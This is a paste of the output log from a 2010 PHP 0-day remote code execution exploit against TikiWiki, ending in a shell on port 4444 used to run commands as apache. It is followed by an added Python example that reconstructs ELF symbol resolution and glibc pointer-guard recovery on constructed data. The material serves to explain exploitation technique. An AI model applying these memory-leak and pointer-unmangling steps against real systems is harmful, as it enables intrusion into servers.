SyScan 2010 - PHP 0-day

By: a guest on Jun 17th, 2010
$ ./exploit.py -h http://t.testsystem/
PHP xxx() Remote Code Execution Exploit (TikiWiki Version)
Copyright (C) 2010 Stefan Esser/SektionEins GmbH
                           *** DO NOT DISTRIBUTE ***

[+] Connecting to determine wordsize
[+] Wordsize is 32 bit
[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
[+] PHP version is 5.3.x
[+] Connecting to determine XXX version
[+] PHP version >= 5.3.2
[+] Determining endianness of system
[+] System is little endian
[+] Leaking address of std_object_handlers
[+] Found std_object_handlers address to be 0xb76e84a0
[+] Leaking std_object_handlers
[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
[+] Optimized to 0xb74008f0
[+] Scanning for executable header
[+] ELF header found at 0xb73ab000
[+] Retrieving and parsing ELF header
[+] Retrieving program headers
[+] Retrieving ELF string table
[+] Looking up ELF symbol: executor_globals
[+] Found executor_globals at 0xb76fe280
[+] Looking up ELF symbol: php_execute_script
[+] Found php_execute_script at 0xb75386c0
[+] Looking up ELF symbol: zend_eval_string
[+] Found zend_eval_string at 0xb7586580
[+] Searching JMPBUF in executor_globals
[+] Found JMPBUF at 0xbfcc64b4
[+] Attempt to crack JMPBUF
[+] Determined stored EIP value 0xb753875a from pattern match
[+] Calculated XORER 0x68ab06ea
[+] Unmangled stored ESP is 0xbfcc5470
[+] Checking memory in front of JMPBUF for overwriting possibilities
[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
[+] Returning into PHP... Spawning a shell at port 4444

...
$ nc t.testsystem 4444
Welcome to the PHPShell 5/22/2010 1:27 am

system("uname -a");
Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
system("id");
uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0

...
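The log above only names the steps of the chain. The Python below is an added example, not this paste's tool and not Stefan Esser's exploit, reconstructing two of those steps generically: locating the ELF header of a loaded library by scanning backwards from a leaked pointer and resolving exported symbols (executor_globals, php_execute_script, zend_eval_string) by walking the program headers, PT_DYNAMIC and the dynamic symbol table through a memory-read primitive; and recovering the glibc pointer guard (the log's "XORER") from a setjmp buffer given one known stored return address, then unmangling the stored ESP. Everything it reads is constructed inside the block: the Memory class stands in for the remote read primitive, build_image produces a minimal ET_DYN image with made-up symbol offsets, and the jmp_buf is mangled with a guard and addresses chosen to echo the log's values rather than taken from the target. The rotate-by-9 is glibc's i386 PTR_MANGLE; the assumption that the library's first PT_LOAD has p_vaddr 0 and that a DT_HASH table is present are the example's, not the page's.

```python
# Added example, not the exploit whose output is shown above (see lead-in).
import struct

PAGE = 0x1000
ELF_MAGIC = b"\x7fELF"
PT_DYNAMIC, DT_NULL, DT_HASH, DT_STRTAB, DT_SYMTAB = 2, 0, 4, 5, 6

class Memory:
    """Stand-in for the remote arbitrary-read primitive, over a constructed image."""
    def __init__(self, base, image):
        self.base, self.image = base, image

    def read(self, addr, n):
        off = addr - self.base
        if off < 0 or off + n > len(self.image):  # a real target would fault here
            raise ValueError("unmapped read at 0x%08x" % addr)
        return bytes(self.image[off:off + n])

def build_image(base, symbols):
    """Minimal 32-bit LE ET_DYN image: Ehdr, PT_LOAD + PT_DYNAMIC, dynamic entries holding
    load-adjusted addresses (as ld.so leaves them in memory), hash header, dynsym, dynstr."""
    DYN, HASH, SYM, STR = 0x100, 0x140, 0x160, 0x200  # arbitrary layout offsets
    strtab, sym = b"\0", b"\0" * 16  # null name, null symbol
    for name, off in symbols.items():
        sym += struct.pack("<IIIBBH", len(strtab), off, 0, 0x11, 0, 1)  # STB_GLOBAL, STT_OBJECT
        strtab += name.encode() + b"\0"
    img = bytearray(2 * PAGE)
    img[0:52] = struct.pack("<16sHHIIIIIHHHHHH", ELF_MAGIC + bytes([1, 1, 1]),  # class, data, version
                            3, 3, 1, 0, 52, 0, 0, 52, 32, 2, 40, 0, 0)  # ET_DYN, EM_386, 2 phdrs
    img[52:84] = struct.pack("<8I", 1, 0, 0, 0, len(img), len(img), 5, PAGE)  # PT_LOAD at vaddr 0
    img[84:116] = struct.pack("<8I", PT_DYNAMIC, DYN, DYN, DYN, 32, 32, 6, 4)
    img[DYN:DYN + 32] = struct.pack("<iIiIiIiI", DT_HASH, base + HASH, DT_STRTAB, base + STR,
                                    DT_SYMTAB, base + SYM, DT_NULL, 0)
    img[HASH:HASH + 8] = struct.pack("<II", 1, len(symbols) + 1)  # nbucket, nchain (= symbol count)
    img[SYM:SYM + len(sym)] = sym
    img[STR:STR + len(strtab)] = strtab
    return img

def find_elf_header(mem, leaked_ptr, max_pages=4096):
    """'Scanning for executable header': step back page by page from a leaked library pointer."""
    addr = leaked_ptr & ~(PAGE - 1)
    for _ in range(max_pages):
        if mem.read(addr, 4) == ELF_MAGIC:
            return addr
        addr -= PAGE
    raise LookupError("no ELF header within %d pages" % max_pages)

def read_cstring(mem, addr, chunk=16):  # NUL-terminated string via the read primitive
    buf = b""
    while b"\0" not in buf[-chunk:]:
        buf += mem.read(addr + len(buf), chunk)
    return buf[:buf.index(b"\0")]

def resolve_symbol(mem, base, name):
    """'Looking up ELF symbol': Ehdr -> phdrs -> PT_DYNAMIC -> dynsym scan. Assumes an ET_DYN
    object whose first PT_LOAD has p_vaddr 0, so base + st_value is the symbol's address."""
    ehdr = mem.read(base, 52)
    if ehdr[:4] != ELF_MAGIC or ehdr[4] != 1 or ehdr[5] != 1:
        raise ValueError("not a 32-bit little-endian ELF")  # cross-checks the wordsize/endian probes
    e_phoff = struct.unpack_from("<I", ehdr, 28)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", ehdr, 42)
    phdrs = (struct.unpack("<III", mem.read(base + e_phoff + i * e_phentsize, 12)) for i in range(e_phnum))
    dyn = base + next(vaddr for ptype, _, vaddr in phdrs if ptype == PT_DYNAMIC)  # StopIteration if none
    tags = {}
    while True:
        d_tag, d_val = struct.unpack("<iI", mem.read(dyn, 8))
        if d_tag == DT_NULL:
            break
        tags[d_tag] = d_val if d_val >= base else base + d_val  # tolerate unrebased entries
        dyn += 8
    symtab, strtab = tags[DT_SYMTAB], tags[DT_STRTAB]
    nsyms = struct.unpack("<II", mem.read(tags[DT_HASH], 8))[1]  # DT_GNU_HASH-only objects need another count
    for i in range(nsyms):
        st_name, st_value = struct.unpack("<II", mem.read(symtab + 16 * i, 8))
        if st_name and read_cstring(mem, strtab + st_name) == name.encode():
            return base + st_value
    raise LookupError(name)

def rol32(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xffffffff

def mangle(ptr, guard):  # glibc i386 PTR_MANGLE as setjmp applies it; used only to build sample data
    return rol32(ptr ^ guard, 9)

def recover_guard(jmp_buf, known_eip):
    """'Attempt to crack JMPBUF': one known plaintext (the return address after the setjmp call
    in php_execute_script) gives guard = ror9(mangled_eip) ^ eip, the log's 'XORER'; the stored
    ESP then demangles the same way. Returns (guard, esp)."""
    regs = struct.unpack("<6I", jmp_buf)  # i386 order: ebx, esi, edi, ebp, esp, eip
    guard = rol32(regs[5], 23) ^ known_eip  # rol 23 == ror 9
    return guard, rol32(regs[4], 23) ^ guard

# Constructed sample data; values chosen to echo the log above, not read from it.
BASE = 0xb73ab000
SYMBOLS = {"executor_globals": 0x1800, "php_execute_script": 0x1100, "zend_eval_string": 0x1400}
MEM = Memory(BASE, build_image(BASE, SYMBOLS))
GUARD, KNOWN_EIP, STORED_ESP = 0x68ab06ea, 0xb753875a, 0xbfcc5470
JMP_BUF = struct.pack("<6I", 0, 0, 0, 0xbfcc64e8, mangle(STORED_ESP, GUARD), mangle(KNOWN_EIP, GUARD))

if __name__ == "__main__":
    base = find_elf_header(MEM, BASE + 0x1234)  # any leaked pointer inside the library
    print({n: hex(resolve_symbol(MEM, base, n)) for n in SYMBOLS}, [hex(v) for v in recover_guard(JMP_BUF, KNOWN_EIP)])
```

Run directly, it prints the three resolved addresses and the recovered guard and ESP. On a live target the read primitive faults on an unmapped page, so find_elf_header must only be started from an address known to lie inside the library, as the leaked std_object_handlers pointer does; the ELF identification check in resolve_symbol is a cheap second confirmation of the wordsize and endianness the log determines with separate probes.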